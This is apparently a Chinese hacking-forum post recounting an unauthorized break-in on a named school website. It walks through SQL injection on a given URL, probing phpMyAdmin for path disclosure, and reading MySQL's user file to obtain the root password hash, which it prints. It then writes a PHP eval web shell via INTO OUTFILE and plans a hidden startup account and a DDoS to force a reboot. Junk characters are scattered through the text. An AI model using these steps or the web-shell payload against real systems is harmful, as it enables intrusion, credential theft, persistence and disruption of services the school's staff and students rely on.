友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
; {2 n/ }! ^- m. y. d  U发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
( Y* r0 |& G7 m6 T2 Q6 a. v6 z* s
' u" u, i- d1 Z# Y

2 Y5 P5 i+ C. d常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

; c# M# Y1 D" E) y# Q% }- \那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
% i( v# I# d7 l; ^# i
1 p2 B! d' _6 K# S' m% g试着爆绝对路径：
" D3 Q; V( X: Z1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
) F8 f- }. M+ \; h/ n" g3./load_file()  
4 u0 O* |& c, V" f7 o4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
6 G+ n% I, B, i0 f) r7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
6 X& M7 T; Y+ q7 r9 S( }
/ s5 d/ @) N- @& L/ C, I' N! P$ b- U均不行...........................
. ~- d& `* N* W# g- Y5 Q
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
6 A! H; @8 `& C& G8 T
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
- c, z# A7 s9 n' B7 E" P
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

2 V' D/ m2 W: W, n" t6 t: |敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
- T4 L$ u5 {5 v- I. ?  [4 @
& l" C7 V( @( bhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

$ Q. i) J$ c9 [+ ~6 |, ~1 c7 ^自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

: i9 p! P8 k" t1 W1 l4 F17---- r(0072)
/ q0 _: T! |7 t5 d& E+ B6 V; S18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
4 Q  S& d4 ^6 X* o( \( h24---- E(0045)
$ u. Q( [9 `2 U7 h, l  Y) f25---- 1(0031)
26---- C(0043)
' a4 g3 z. s! ^8 m, L27---- 5(0035)
7 o/ N  ~0 E; @8 Z7 n5 A28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
; r2 a" F: @$ v; O31---- A(0041)
( `1 L, K: i) }; `32---- 9(0039)
) f" m8 ~* r7 C# F33---- B(0042)
34---- 5(0035)
35---- 4(0034)
7 W) G. E4 p" b' U0 S7 O2 P36---- 8(0038)
! ]: i6 ?. x% m. N+ ~, u37---- 6(0036)
* Y8 y* T! I& m7 ]! n" w, j$ W38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
- [4 L& a: j' [. g3 b* ~44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
+ |/ m4 [8 O( q47---- F(0046)
48---- F(0046)
1 a* z. F* J% ^49---- 4(0034)
  N9 e+ U4 H" ?( N, K3 H$ i50---- F(0046)
51---- 0(0030)
52---- 3(0033)
/ C. Q% N4 R) E# G0 r53---- 2(0032)
54---- A(0041)
" z7 r# F6 P% \* {1 f" `55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
" h6 e8 @4 Z6 R* Z59---- *(0035)
+ J. ]  ~1 h9 r+ Q' n  {/ X' b60---- *(0041)
) R# i0 z. I7 t7 _9 I# T61---- *0032)
5 x% G1 b7 c! n4 i
* s/ u. K* {9 w1 t' H$ I3 J2 C! A解密后成功登陆phpmyamin
                          

                             
3 T/ w, D; T( I
; l  s4 {) C% I: K- ^* v5 D找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：
) B6 n: g$ p. i" P" u
  P' [) L7 p  C服务器不支持asp,aspx,php提权无果...................
- m' C0 z- s" c5 r0 i/ P- g
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
( U6 V) e$ u) [: P: Z

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

$ e; g& O8 A: C7 V- M+ t* |

成员

-------------------------------------------------------------------------------
  [2 D1 ]  c% w) ~admin
Administrator
" j. e: S0 `% Q& y# D& ?4 Xslipper$
( J+ m" @8 D3 D/ ?; Isqluser
命令成功完成。
2 i* a+ Z1 C, N; u9 }6 Y. t3 I
" r! g7 ~- B% z( B- O服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
1 [0 n  f4 v! c0 e$ {4 i
7 ]7 Q+ m4 o# ?      

angel